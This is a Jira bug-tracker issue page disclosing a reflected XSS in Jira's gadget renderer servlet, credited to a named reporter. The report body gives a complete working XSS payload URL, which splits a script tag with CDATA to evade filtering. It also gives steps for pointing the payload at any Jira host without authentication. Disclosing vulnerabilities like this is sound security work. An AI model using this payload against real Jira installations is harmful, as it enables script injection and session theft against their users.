Uploaded image for project: 'Jira Platform Cloud'
  1. Jira Platform Cloud
  2. JRACLOUD-66366

Reflected XSS affecting JIRA via Gadgets

XMLWordPrintable

      Steps to recreate:

      1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:

      https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

      2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found on later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.

      /plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

      Note: This XSS requires no user interaction, or authentication.

      The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.

              ohernandez@atlassian.com Oswaldo Hernandez (Inactive)
              73e00aef4e3f Nir Goldshlager
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

                Created:
                Updated:
                Resolved: